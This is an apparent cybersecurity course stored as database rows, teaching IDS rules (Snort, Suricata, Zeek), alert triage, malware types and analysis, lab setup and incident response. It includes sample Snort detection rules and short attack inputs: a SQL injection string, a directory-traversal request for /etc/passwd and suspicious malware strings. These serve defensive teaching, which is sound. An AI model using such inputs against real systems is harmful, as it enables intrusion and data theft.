(592, 253, '## Snort: The Grandfather of IDS\n\n**Snort** (created by Sourcefire, now owned by Cisco) is the de-facto standard for NIDS. Even if you use other tools, you will likely use \"Snort Rules\" because the syntax is universal.\n\n### Snort Architecture\n1.  **Packet Decoder**: Prepares packets for inspection.\n2.  **Preprocessors**: Normalizes traffic (e.g., reassembling fragmented TCP packets so attackers can\'t hide payload by splitting it up).\n3.  **Detection Engine**: The core. Matches packets against rules.\n4.  **Logging/Alerting**: Outputs to a file, Syslog, or Database.\n\n### Snort Rule Syntax (Memorize This!)\nA Snort rule has two parts: The **Header** (Action/Protocol/IPs) and the **Options** (What to look for).\n\n`alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:\"Possible SQL Injection\"; content:\"UNION SELECT\"; nocase; sid:1000001; rev:1;)`\n\n*   `alert`: The Action. (Could be `drop`, `log`, `pass`).\n*   `tcp`: The Protocol (udp, icmp, ip).\n*   `$EXTERNAL_NET any`: Source IP and Port.\n*   `->`: Direction (One way).\n*   `$HTTP_SERVERS 80`: Destination IP and Port.\n*   `( ... )`: The Options.\n    *   `msg`: What shows up in the alert log.\n    *   `content`: The specific string to search for in the packet payload (\"UNION SELECT\").\n    *   `nocase`: Ignore Case (Select vs sELecT).\n    *   `sid`: Signature ID (Unique number).\n    *   `rev`: Revision number.\n\n### Writing a Custom Rule\nScenario: You want to detect anyone downloading a file named `confidential_salary.xlsx` via HTTP.\n`alert tcp any any -> any any (msg:\"Sensitive File Access\"; content:\"confidential_salary.xlsx\"; http_uri; sid:1000002;)`\n(Note: `http_uri` tells Snort to look only in the URI part of the packet, making it faster).\n\n### Pros and Cons\n*   **Pros**: Universal, massive community rule sets (Emerging Threats - ET Open).\n*   **Cons**: Single-threaded (historically). On 10Gbps networks, Snort execution can bottleneck one CPU core while others sit idle. (Snort 3.0 fixes this, but adoption is slow).', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(593, 254, '## Suricata: The Multithreaded Powerhouse\n\n**Suricata** (managed by OISF) is the modern competitor to Snort. It uses the same rule syntax (mostly) but was built for speed and deep visibility.\n\n### Key Differences from Snort\n\n#### 1. Multi-Threading\nSuricata is natively multi-threaded. If you put it on a 64-core server, it will use all 64 cores to process traffic. This allows it to handle massive bandwidth (10Gbps, 40Gbps, 100Gbps) that would choke legacy Snort.\n\n#### 2. Protocol Awareness (Application Layer)\nSuricata doesn\'t just look at bytes; it understands the \"App\".\n*   It automatically identifies HTTP, TLS, SMB, FTP, DNS.\n*   Even if you run HTTP on port 8080 (non-standard), Suricata sees the handshake and says \"This is HTTP.\"\n*   **EVE.json**: Suricata produces a rich JSON log file (`eve.json`) that logs metadata for *every* flow, not just alerts.\n    *   *Example*: It logs every TLS certificate exchange. You can investigate \"Self-Signed Certs\" or \"Expired Certs\" effortlessly.\n\n#### 3. File Extraction\nSuricata can automatically carve files out of the stream.\n*   Configuration: `file-store: yes`\n*   Result: If a user downloads a `.exe` or `.pdf`, Suricata can save a copy of that file to disk for the Malware Analysis team to sandbox later.\n\n### Zeek (Formerly Bro)\nWhile talking about Suricata/Snort, we must mention **Zeek**.\n*   **Snort/Suricata** = \"Is this bad?\" (Alerting).\n*   **Zeek** = \"What is happening?\" (Visibility).\nZeek creates transaction logs. `conn.log` (all connections), `http.log` (all web requests), `dns.log` (all resolutions).\nIt is less about signatures and more about generating high-quality structured data for your SIEM to hunt through.\n\n### Which one to choose?\n*   **Snort**: If you need lightweight, standard IPS.\n*   **Suricata**: If you have high bandwidth and want metadata (TLS/HTTP info).\n*   **Zeek**: If you want deep forensics and threat hunting capability (often run *alongside* Suricata).', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(594, 255, '## Analyzing IDS Alerts\n\nAs an Analyst, you will stare at IDS alerts all day. You need to quickly decide: **True Positive** (Real Attack) or **False Positive** (Noise).\n\n### The Analysis Workflow\n\n#### Step 1: Read the Rule (The \"msg\")\n*   Alert: `ET EXPLOIT Obfuscated JavaScript Exploit Kit Landing Page`\n*   Meaning: An external website tried to run a script to exploit the browser.\n\n#### Step 2: Check the Direction\n*   `External -> Internal`: Attack Attempt.\n*   `Internal -> External`: Compromise/Beaconing/Exfiltration. (These are usually scarier).\n\n#### Step 3: Check the Payload (The Packet Capture)\nMost SIEMs/IDS allow you to view the payload that triggered the alert.\n*   **Context**: Did the payload contain readable text?\n    *   Alert says \"SQL Injection\". Payload contains: `user_id=5`. -> **False Positive**. (5 is normal).\n    *   Alert says \"SQL Injection\". Payload contains: `user_id=1 OR 1=1`. -> **True Positive**.\n\n#### Step 4: Check the Response\nDid the server respond?\n*   **Request**: `GET /../../etc/passwd` (Directory Traversal).\n*   **Response**: `404 Not Found`.\n*   **Verdict**: Attempted attack, but **Failed**. (Low Priority).\n*   **Response**: `200 OK` (Followed by root:x:0:0...).\n*   **Verdict**: **Successful Compromise**. (Critical Priority).\n\n### Common False Positives\n1.  **Vulnerability Scanners**: If your creative team runs Nessus/Qualys, your IDS will light up like a Christmas tree. (Whitelist the Scanner IP).\n2.  **P2P Traffic**: Torrent apps often use strange behavior that looks like scanning.\n3.  **Encrypted Traffic**: Sometimes encrypted bytes coincidentally match a text signature. (e.g., a random string inside a JPEG image matches a \"Base64\" signature).\n\n### The \"Default Deny\" Mindset\nWhen investigating, assume it is real until proved otherwise. \"I think this is a False Positive\" is the last words of many fired analysts. Prove it.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(595, 256, '## Module 25 Review\nYou studied:\n*   **NIDS vs HIDS**: Network vs Host.\n*   **Signatures**: The primary method of detection.\n*   **Snort/Suricata**: The tools of the trade.\n*   **Analysis**: Verifying if the alert was a successful attack or just noise.\n\nThis concludes the Detection Engineering section of Path 3.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 14:17:57'),
(596, 261, '## Malware Categories: Know Your Enemy\n\n\"Malware\" is a catch-all term for \"Malicious Software\". However, calling everything a \"Virus\" is like calling every vehicle a \"Car\" (inaccurate when it is a tank or a jet). As an analyst, you must use precise terminology.\n\n### 1. Virus\n*   **Definition**: Code that attaches itself to a legitimate program (host). It cannot run by itself. It needs you to run the host program.\n*   **Behavior**: Replicates by infecting other files.\n*   **Analogy**: A biological virus needs a human cell to reproduce.\n*   **Example**: CIH (Chernobyl), file infectors. *Rare in modern times.*\n\n### 2. Worm\n*   **Definition**: A standalone program that propagates automatically across a network. It does **not** need a host file and does **not** need user interaction.\n*   **Behavior**: Scans the network for vulnerabilities (e.g., SMB exploits), copies itself, and executes.\n*   **Impact**: Can saturate network bandwidth instantly.\n*   **Example**: **WannaCry** (spread via EternalBlue), **Conficker**, **Morris Worm**.\n\n### 3. Trojan Horse\n*   **Definition**: Malware disguised as legitimate software.\n*   **Behavior**: You think you are downloading \"Adobe Photoshop Crack.exe\" or \"Zoom_Installer.exe\". You run it, it installs the app (maybe), but also installs the malware.\n*   **Key**: It relies on **Social Engineering**, not exploits.\n*   **Example**: **Emotet** (often delivered via fake invoices), **Zeus**.\n\n### 4. Ransomware\n*   **Definition**: Malware that encrypts your files and demands payment for the decryption key.\n*   **Behavior**:\n    1.  Infects machine.\n    2.  Contacts C2 server (to generate keys).\n    3.  Encrypts documents (`.docx`, `.jpg`, `.pdf`).\n    4.  Changes wallpaper to \"YOUR FILES ARE ENCRYPTED\".\n*   **Evolution**: Modern Ransomware (Double Extortion) also *steals* your data before encrypting it, threatening to leak it if you don\'t pay.\n*   **Example**: **Ryuk**, **Conti**, **LockBit**.\n\n### 5. Rootkit\n*   **Definition**: Malware designed to hide its existence. It digs deep into the OS (Kernel level).\n*   **Behavior**: It intercepts System Calls.\n    *   You ask Windows: \"Show me all files in C:Windows\".\n    *   Windows asks Kernel.\n    *   Rootkit intercepts: \"List files, but remove \'evil.sys\' from the list.\"\n    *   Windows shows you the list. You see nothing.\n*   **Detection**: Extremely difficult. Usually requires memory forensics.\n\n### 6. Spyware / Keylogger\n*   **Definition**: Steals information.\n*   **Behavior**: Records keystrokes (passwords), takes screenshots, activates the webcam.\n*   **Example**: **Pegasus** (Mobile spyware), **Agent Tesla**.\n\n### 7. Cryptominer (Coinminer)\n*   **Definition**: Steals your CPU/GPU power to mine cryptocurrency (Monero).\n*   **Symptoms**: Computer fans spin at 100%, system becomes sluggish.\n*   **Risk**: It proves the attacker has code execution. Today it\'s a miner; tomorrow it could be Ransomware.\n\n### 8. RAT (Remote Access Trojan)\n*   **Definition**: Logic that gives the attacker full remote control (Screen, Mouse, Shell, Files).\n*   **Behavior**: It\'s like TeamViewer for hackers.\n*   **Example**: **NjRAT**, **DarkComet**.\n\n### Review\n*   If it spreads on its own -> **Worm**.\n*   If it looks like a game but isn\'t -> **Trojan**.\n*   If it locks your files -> **Ransomware**.\n*   If it hides in the kernel -> **Rootkit**.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(597, 262, '## Static vs. Dynamic Analysis: Two Roads to Truth\n\nWhen you find a suspicious file (`invoice.exe`), you have two ways to analyze it.\n\n### 1. Static Analysis (The \"Autopsy\")\nExamining the file **without running it**.\nIt is safe, fast, but can be defeated by obfuscation.\n\n*   **What we look for**:\n    *   **Hashes**: MD5/SHA256. Is this file known to VirusTotal?\n    *   **Strings**: ASCII/Unicode text inside the binary.\n        *   Bad: `cmd.exe`, `Powershell -enc`, `http://evil.com/payload`.\n        *   Good: `Copyright Microsoft Corporation`.\n    *   **Imports (PE Headers)**: What Windows functions does this program use?\n        *   `InternetOpenUrl`: Connects to internet.\n        *   `GetKeyState`: Logs keystrokes?\n        *   `CryptEncrypt`: Ransomware?\n    *   **Packers**: Is the code compressed/obsfuscated (UPX)?\n\n### 2. Dynamic Analysis (The \"Sandbox\")\nRunning the file in a controlled, isolated environment to see **what it does**.\nIt is dangerous (if it escapes) but shows the true behavior.\n\n*   **What we look for**:\n    *   **Process Activity**: Did it spawn `cmd.exe`?\n    *   **File System**: Did it drop a file in `C:Temp`?\n    *   **Registry**: Did it add a Run key for persistence?\n    *   **Network**: Did it DNS query `attacker.com`?\n\n### The Hybrid Workflow\nAlways start with Static.\n1.  **Hash it**: Use `sha256sum`. Check VirusTotal. If it\'s known bad, you are done.\n2.  **Strings it**: Use `strings`. Look for IPs/URLs.\n3.  **PE Analysis**: Use `PEStudio`. Check imports.\n4.  **Sandbox it**: If Static is inconclusive, move to Dynamic. Run it in a VM (Cuckoo/Any.Run) and watch the fireworks.\n\n### Evasion Techniques\n*   **Anti-Static**:\n    *   **Packing**: Compressing the code so \"Strings\" returns garbage. The code only unpacks in memory when run.\n    *   **Obfuscation**: Changing variable names (`var a = 1`) to nonsense (`var x8z9 = 1`).\n*   **Anti-Dynamic**:\n    *   **Sleep**: \"Wait 1 hour before doing anything.\" (Sandboxes usually only run for 5 minutes).\n    *   **User Check**: \" Check if the mouse is moving. If not, I am in a sandbox. Do nothing.\"\n    *   **VM Check**: \"Check hardware ID. If it says \'VMware Virtual Disk\', do nothing.\"', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(598, 263, '## Setting Up a Safe Malware Lab\n\n**WARNING**: NEVER analyze malware on your host machine or your corporate workstation. One mistake and you infect the network. You need a dedicated, isolated lab.\n\n### 1. The Hypervisor\nYou need virtualization software.\n*   **VirtualBox** (Free, Open Source).\n*   **VMware Workstation** (Standard, robust).\n\n### 2. The Network Isolation (Crucial!)\nYou must ensure the malware cannot talk to your home/work network.\n*   **Host-Only Mode**: The VM can talk to the Host (and other VMs) but **cannot** access the Internet or your LAN.\n*   **Custom vNet**: Create a completely isolated virtual switch.\n*   **Fake Internet**: Use a tool like **INetSim**.\n    *   Malware: \"I want to download bad.exe from evil.com\"\n    *   INetSim: \"I am evil.com! Here is your file.\" (Sends a harmless dummy file).\n    *   *Result*: The malware runs, thinking it has internet, but is safely contained.\n\n### 3. The Analysis VMs\nYou don\'t just need a Windows 10 ISO. You need tools.\n*   **FlareVM (Windows)**: A script by Mandiant. You install a clean Windows VM, run the script, and it installs hundreds of tools (x64dbg, PEStudio, Wireshark, Process Hacker).\n*   **REMnux (Linux)**: A Linux distro built for malware analysis (like Kali, but for reverse engineering). It includes tools to analyze PDF/Office docs, decode scripts, and run INetSim.\n\n### 4. Snapshotting\nThis is the superpower of VMs.\n1.  Install Windows.\n2.  Install Tools.\n3.  Disable Windows Defender (so it doesn\'t delete your samples).\n4.  **TAKE A SNAPSHOT** (Name it: \"Clean State\").\n5.  Infect the VM. Watch it die.\n6.  **Revert to Snapshot**.\n7.  In 10 seconds, you are back to a clean state, ready for the next sample.\n\n### Lab Safety Rules\n1.  **Disconnect**: Verify network adapter is \"Host-Only\" or \"Custom\".\n2.  **No Sharing**: Disable \"Shared Folders\" between Host and Guest.\n3.  **No USB**: Do not plug USB drives into the VM.\n4.  **VPN**: If you must analyze \"live\" (letting it connect to internet), use a VPN and a \"Burner\" network separate from your company Wi-Fi.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(599, 264, '## Static Analysis Tools: The Surgeon\'s Kit\n\nHere are the essential tools you will use during Static Analysis. Most are free.\n\n### 1. VirusTotal (The First Stop)\n*   **What it is**: A website that scans your file with 70+ Antivirus engines.\n*   **Usage**: Upload hash.\n*   **Verdict**:\n    *   50/70 red: Definitely Malware.\n    *   0/70 green: Clean... OR a brand new Zero-Day.\n    *   **Community Tab**: Read comments. Other analysts often post \"This is Emotet dropped via phishing.\"\n\n### 2. Strings\n*   **Command**: `strings file.exe` (Linux) or `strings.exe` (Windows Sysinternals).\n*   **Function**: Extracts printable characters.\n*   **What to hunt**:\n    *   IP Addresses (`1.2.3.4`).\n    *   URLs (`http://...`).\n    *   Filenames (`dropped_malware.exe`).\n    *   Registry Keys (`SoftwareMicrosoftWindowsCurrentVersionRun`).\n    *   Error messages (often reveal the compiler/language).\n\n### 3. PEStudio (Windows)\n*   **Function**: Deep inspection of the Portable Executable (PE) header.\n*   **Key Features**:\n    *   **Indicators**: Highlights suspicious things in red (e.g., \"File has no digital signature\", \"File references a browser\").\n    *   **Imports**: Shows what DLLs/APIs are used.\n    *   **Resources**: Sometimes malware hides a second .exe inside its \"Icon\" or \"Image\" resource section.\n\n### 4. Capa (Mandiant)\n*   **Function**: \"What does this do?\" using rules.\n*   **Output**: Instead of showing you assembly code, it says:\n    *   \"Capability: Encrypts Data using AES\"\n    *   \"Capability: Connects to HTTP\"\n    *   \"Capability: Takes Screenshot\"\n*   It\'s like Google Translate for Assembly code.\n\n### 5. PEiD / Detect It Easy (DiE)\n*   **Function**: Detects **Packers**.\n*   **Scenario**: You run `strings` and see random garbage.\n*   **DiE says**: \"Packed with UPX\".\n*   **Action**: You know you must unpack it (using `upx -d` or manual unpacking) before you can analyze it.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(600, 265, '## Dynamic Analysis (Sandboxing)\n\nWhen Static Analysis hits a wall (obfuscation), we detonate the bomb in a box.\n\n### 1. Automated Sandboxes (Cuckoo / Cuckoo-Modified)\n*   **Concept**: You submit a file. The system spins up a VM, runs the file, records everything for 5 minutes, kills the VM, and gives you a report.\n*   **The Report**:\n    *   **Screenshots**: Did it pop up a Ransomware note?\n    *   **Network**: PCAPs of traffic.\n    *   **Dropped Files**: Copies of any files it created.\n    *   **API Calls**: Every interaction with Windows.\n\n### 2. Interactive Analysis (Any.Run)\n*   **Concept**: A web-based sandbox where *you* interact with the VM.\n*   **Scenario**: The malware is a Word Doc that says \"Click Enable Content\".\n    *   In Cuckoo, no one clicks it, so nothing happens.\n    *   In Any.Run, you watch the screen, you click \"Enable Content\", and BAM, the malware runs. You see the process tree explode in real-time.\n*   **Pros**: instant visibility, handles user-interaction triggers.\n\n### 3. Monitoring Tools (Manual Sandbox)\nIf you are running the malware in your own FlareVM:\n*   **Process Hacker**: Task Manager on steroids. Shows parent-child trees, memory strings, and coloring for packed processes.\n*   **Procmon (Process Monitor)**: The holy grail. Records *every* File System, Registry, and Process event.\n    *   *Tip*: It generates millions of events. Filter is your friend. `ProcessName is evil.exe`.\n*   **Regshot**:\n    1.  Take \"Shot 1\" (Registry before malware).\n    2.  Run Malware.\n    3.  Take \"Shot 2\".\n    4.  Compare. It shows you exactly what registry keys were added (Persistence).\n*   **Fiddler / Wireshark**: Capture the network traffic. Fiddler is great for decrypting HTTPs if you install its root cert.\n\n### Indicators of Compromise (IOCs)\nThe goal of Dynamic analysis is to extract IOCs to put into your SIEM/EDR.\n*   **Network IOCs**: C2 IPs, Domains, URLs to block.\n*   **Host IOCs**: File Hashes, Mutex names, Registry keys, Filenames.\n*   **Behavioral IOCs**: \"Powershell.exe connecting to the internet\".', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(601, 266, '## Identifying IOCs from Malware\n\nYou\'ve analyzed the malware. You have pages of notes. Now, what do you do? You need to extract **Actionable Intelligence**.\n\n### The Pyramid of Pain\nNot all IOCs are equal. David Bianco\'s \"Pyramid of Pain\" describes how hard it is for an attacker to change their IOCs vs how hard it is for you to detect them.\n\n#### 1. Hash Values (Bottom - Trivial)\n*   **What**: MD5/SHA256 of the file.\n*   **Attacker Effort**: Trivial. Change 1 byte, hash changes.\n*   **Value**: Low. Only catches that *one* specific file.\n\n#### 2. IP Addresses (Easy)\n*   **What**: C2 Server IP.\n*   **Attacker Effort**: Easy. Change IP using a Proxy/VPN.\n*   **Value**: Low/Medium. IPs serve many domains.\n\n#### 3. Domain Names (Simple)\n*   **What**: `evil.com`.\n*   **Attacker Effort**: Simple. Register a new domain (`evil2.com`).\n*   **Value**: Medium. Requires money/time for attacker.\n\n#### 4. Network/Host Artifacts (Annoying)\n*   **What**: User-Agent strings, specific registry keys, distinctive filename patterns.\n*   **Attacker Effort**: Annoying. Tthey have to rewrite their code config.\n*   **Value**: High. Catches the *tool*.\n\n#### 5. Tools (Challenging)\n*   **What**: Detecting the tool itself (e.g., Cobalt Strike beacon) regardless of config.\n*   **Attacker Effort**: Challenging. They have to write a new tool from scratch.\n\n#### 6. TTPs (Top - Tough)\n*   **What**: Tactics, Techniques, and Procedures. (Behavior).\n*   **Example**: \"Pass-the-Hash\", \"Spearphishing with Macros\".\n*   **Attacker Effort**: Tough. They have to learn a whole new way of hacking.\n*   **Value**: **Highest**. If you detect \"Pass-the-Hash\", you catch them no matter what tool they use.\n\n### Creating the Report\nYour Malware Analysis Report should contain:\n1.  **Executive Summary**: \"This is ransomware. It spreads via SMB. Risk is Critical.\"\n2.  **Technical Details**:\n    *   Packer used.\n    *   Compilation timestamp.\n    *   Capabilities.\n3.  **IOC List (The \"Blocklist\")**:\n    *   `Hash: e3b0c442...`\n    *   `Domain: update-microsoft-support.com`\n    *   `IP: 192.0.2.1`\n    *   `File: C:WindowsTempwinlogon_update.exe`\n4.  **YARA Rules**: A way to describe the malware pattern to hunt for it across the organization.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(602, 267, '## Module 26 Review\nYou learned:\n1.  **Malware Types**: Ransomware vs RAT vs Worm.\n2.  **Static**: Reading strings and hashes.\n3.  **Dynamic**: Detonating in a sandbox.\n4.  **IOCs**: The output of your analysis used to protect the network.\n\nNext: How to handle the incident when the malware detection fires (Incident Response).', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 14:19:16'),
(603, 271, '## What is Incident Response?\n\n**Incident Response (IR)** is the structured approach to addressing and managing the aftermath of a security breach or cyberattack. The goal is to handle the situation in a way that limits damage and reduces recovery time and costs.\n\n### Incident vs. Event\n*   **Event**: Any observable occurrence in a system.\n    *   *Example*: User login, firewall deny, file creation.\n    *   *Count*: Millions per day.\n*   **Alert**: An event that triggers a warning based on a rule.\n    *   *Example*: 10 Failed logins.\n*   **Incident**: A violation of security policies that threatens CIA (Confidentiality, Integrity, Availability).\n    *   *Example*: Data breach, Malware infection, Denial of Service.\n    *   *Count*: Hopefully rare.\n\n### Why do we need a Process?\nWhen a breach happens, panic sets in.\n*   \"Pull the plug!\"\n*   \"Wipe the server!\"\n*   \"Call the police!\"\n*   \"Don\'t tell anyone!\"\nWithout a plan, people make mistakes. They destroy evidence (rebooting wipes memory). They tip off the attacker. They violate legal requirements.\nIR is about **Organized Chaos Control**.\n\n### The Computer Security Incident Response Team (CSIRT)\nThe team responsible for IR.\n*   **Technical**: SOC Analysts, Forensics Experts, Malware Engineers.\n*   **Non-Technical**:\n    *   **Legal**: \"Do we have to notify the government? The customers?\"\n    *   **PR/Comms**: \"What do we tell the press?\"\n    *   **HR**: \"Was it an insider? Do we fire them?\"\n    *   **Management**: Approves decisions (e.g., \"Shut down the ecommerce site\").\n\n### The Goal of IR\n1.  **Contain**: Stop the bleeding.\n2.  **Eradicate**: Remove the infection.\n3.  **Recover**: Get back to business.\n4.  **Learn**: Don\'t let it happen again.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(604, 272, '## The IR Lifecycle (NIST 800-61)\n\nThe Bible of Incident Response is **NIST Special Publication 800-61r2**. It defines the four phases of the lifecycle.\n\n### 1. Preparation\nThis happens *before* the attack.\n*   **Action**: Establishing the CSIRT, buying tools, writing playbooks, setting up communication channels.\n*   **Key**: If you aren\'t prepared, you have already failed.\n\n### 2. Detection & Analysis\nThis is where the SOC lives.\n*   **Action**: Monitoring the SIEM, triaging alerts, determining if it is a False Positive or a Real Incident.\n*   **Key**: Determining the **Scope**. Is it 1 laptop? Or the entire Domain?\n\n### 3. Containment, Eradication, & Recovery\nThe \"Fix it\" phase.\n*   **Containment**: Stop the spread. (Isolation).\n*   **Eradication**: Remove the threat (Delete malware, disable accounts).\n*   **Recovery**: Restore data from backups, patch vulnerabilities, return to normal.\n\n### 4. Post-Incident Activity (Lessons Learned)\nThe most important, yet most ignored phase.\n*   **Action**: A meeting 2 weeks later. \"What went wrong? Why didn\'t we catch it sooner? How do we improve?\"\n*   **Output**: New SIEM rules, new Playbooks, better tools.\n\n### The Feedback Loop\nIt is a cycle. The \"Lessons Learned\" feed back into \"Preparation\".\n*   \"We got hacked because we didn\'t have MFA.\"\n*   Lesson: Need MFA.\n*   Preparation: Implement MFA.\n*   Result: Next time, that attack fails.\n\n### Alternative Model: SANS PICERL\nSANS breaks it down slightly differently (6 steps):\n1.  **P**reparation\n2.  **I**dentification (Detection)\n3.  **C**ontainment\n4.  **E**radication\n5.  **R**ecovery\n6.  **L**essons Learned', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(605, 273, '## Phase 1: Preparation - The Shield\n\nPreparation is everything. \"Sweat more in training, bleed less in battle.\"\n\n### 1. Policy & Procedure\n*   **Incident Response Policy**: A high-level document signed by the CEO authorizing the CSIRT to act. (e.g., \"CSIRT has the authority to disconnect *any* system, even the CEO\'s laptop, if infected\").\n*   **Playbooks (Runbooks)**: Detailed step-by-step guides for specific scenarios.\n    *   *Phishing Playbook*: 1. Verify sender. 2. Delete email. 3. Check clicks.\n    *   *Ransomware Playbook*: 1. Isolate host. 2. Verify backups. 3. Contact Legal.\n\n### 2. Tools & Resources\nYou cannot install tools *during* the breach. You need them ready.\n*   **Communication**: Out-of-Band methods. If the hackers own your Email server and Slack, how do you talk? (Signal, WhatsApp, Personal emails).\n*   **War Room**: A physical or virtual room where the team gathers.\n*   **Forensic Workstations**: Laptops ready to analyze evidence.\n*   **Jump Kits**: USB drives with static binaries (triage tools) that you can plug into an infected machine.\n\n### 3. The Baseline\nYou cannot know what is \"Abnormal\" if you don\'t know what is \"Normal\".\n*   What ports are usually open?\n*   What is the average CPU usage?\n*   list of authorized Admins.\n*   **Network Diagram**: Essential. You can\'t defend a network if you don\'t know it exists.\n\n### 4. Training\n*   **Tabletop Exercises (TTX)**: Simulation games. The team sits in a room and talks through a scenario.\n    *   Moderator: \"Scenario: The CFO\'s laptop is encrypted and demanding Bitcoin. Go.\"\n    *   Analyst: \"I isolate the host.\"\n    *   Moderator: \"The host is off-site. You can\'t reach it.\"\n    *   Analyst: \"Oh... uh...\"\n    *   *Result*: Gap identified! Need a way to isolate off-site hosts.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(606, 274, '## Phase 2: Detection & Analysis - The Alarm\n\nThis is the phase where the \"Boom\" happens (or where we notice it).\n\n### Vectors of Detection\n*   **Users**: \"My computer is acting weird.\" \"I clicked a link and now I have a popup.\"\n*   **SIEM**: \"Correlation Rule: Malware Beacon detected.\"\n*   **Third Party**: \"FBI calls and says they found your data on the Dark Web.\" (The worst way to find out).\n\n### Triage (The ER Doctor)\nWhen an alert triggers, you must Triage.\n1.  **Validate**: Is it real? (False Positive check).\n2.  **Categorize**:\n    *   *Category*: Malware, Denial of Service, Unauthorized Access, Harassment.\n3.  **Prioritize**:\n    *   *Impact*: High/Med/Low.\n    *   *Urgency*: High/Med/Low.\n    *   *Scenario*:\n        *   Ransomware on CEO laptop -> **Critical**.\n        *   Adware on a Guest WiFi laptop -> **Low**.\n\n### Scoping\nOnce confirmed, you need to determine the **Blast Radius**.\n*   \"We found malware on Host A. Is it also on Host B? C? D?\"\n*   Check SIEM for similar traffic.\n*   Check File Hashes on entire fleet.\n*   **Golden Rule**: Assume you only developed 10% of the breach. Keep digging.\n\n### Analysis\n*   Forensics: Disk and Memory analysis.\n*   Malware Analysis: Reverse engineering samples found.\n*   Log Analysis: Tracing the attacker\'s lateral movement.\n\n### Documentation during Analysis\nEvery command you run, every file you touch, you must **Document**.\n*   \"10:05 AM: Reviewed firewall logs.\"\n*   \"10:10 AM: Isolated Host A.\"\n*   \"10:25 AM: Found sample in C:Temp.\"\nThis is crucial for legal reasons later.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(607, 275, '## Phase 3: Containment - Stop the Bleeding\n\nThe virus is inside. You have identified it. Now stop it from spreading.\n\n### Short-Term Containment\nImmediate action to stop damage.\n*   **Network Isolation**: Unplug the ethernet cable. Disable the switch port. Use EDR \"Network Isolate\" feature.\n*   **Shutdown**: Generally **BAD IDEA** because it destroys RAM (Memory evidence). Only shut down if the drive is actively being encrypted (Ransomware) and you can\'t stop it otherwise.\n*   **Firewall Block**: Block the C2 IP addresses at the perimeter.\n\n### Long-Term Containment\nFixing the temporary patches.\n*   Apply patches to the vulnerability.\n*   Change passwords for compromised accounts.\n*   Strengthen firewall rules.\n\n### Checkmate: The Attacker\'s Response\nBe careful. Attackers monitor your response.\n*   If you block their IP, they might get angry and deploy Ransomware immediately (The \"Scorched Earth\" policy).\n*   Sometimes, you might want to **Watch and Wait** (Sandboxing the attacker) to learn their TTPs before cutting them off. This requires high skill and confidence.\n\n### Evidence Preservation\nDuring containment, you must preserve evidence.\n*   **Chain of Custody**: A log of who held the hard drive, when, and where.\n*   Make forensic images of the disk *before* you wipe anything.\n*   Dump memory (RAM) before rebooting.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(608, 276, '## Phase 4: Eradication & Recovery - Clean Up\n\n### Eradication\nThe threat is contained. Now remove it.\n1.  **Re-imaging**: The old way was \"run Antivirus and hope it cleans it.\" The Modern way is **Nuke and Pave**.\n    *   Wipe the drive.\n    *   Re-install OS from a verified clean \"Golden Image\".\n2.  **Sanitization**:\n    *   Remove malicious emails from users\' inboxes.\n    *   Reset passwords (force global reset if Active Directory was compromised).\n3.  **Improve Defenses**:\n    *   The attacker got in via RDP? Disable RDP.\n    *   They used a vulnerability? Patch it.\n\n### Recovery\nBringing systems back online.\n1.  **Prioritization**: Restore business-critical systems first (ERP, Email) > secondary systems.\n2.  **Validation**: Before reconnecting to the internet, **monitor** the restored system. Is it beaconing again? (Attackers often hide \"persistence\" triggers).\n3.  **Data Restoration**: Restore data from clean backups.\n    *   *Risk*: What if the backup also contains the malware? You must scan backups before restoring.\n\n### The \"Screaming Test\"\nSometimes, you disable a compromised account and wait to see who screams (which service breaks). This helps identify hidden dependencies.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(609, 277, '## Phase 5: Post-Incident Activity - The Debrief\n\nThe dust has settled. The bad guys are gone. Time for the \"Hot Wash\" or \"Post-Mortem\".\n\n### The Report\nYou must produce a final Incident Report.\n*   **Executive Summary**: Non-technical. \"We were hacked. It cost $50k. It\'s over. Here is the risk.\"\n*   **Timeline**: detailed, second-by-second account.\n*   **Technical Findings**: How they got in (Root Cause), what they took.\n*   **Recommendations**: The \"To-Do\" list to fix the holes.\n\n### The Root Cause Analysis (RCA)\nUse the \"5 Whys\" technique.\n*   **Problem**: Server was hacked.\n    *   *Why?* Vulnerability in Apache was exploited.\n    *   *Why?* It wasn\'t patched.\n    *   *Why?* The patching script failed.\n    *   *Why?* The server disk was full, so the update failed.\n    *   *Why?* No one monitors disk space on Dev servers.\n*   **Root Cause**: Lack of monitoring on Dev servers.\n*   **Fix**: Implement monitoring on all servers.\n\n### Updating the Organization\n*   **Metrics**: Time to Detect (TTD), Time to Respond (TTR). Did we improve?\n*   **Playbook Updates**: \"Our Ransomware playbook didn\'t say who to call at the ISP. We wasted 1 hour finding the number. Update the playbook.\"\n*   **Evidence Retention**: How long do we keep the forensic images? (Usually years, for legal reasons).\n\n### Closing\nThe goal of this phase is not to blame (Finger Pointing), but to improve (System Strengthening). If you skip this, you WILL be hacked again by the same technique.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
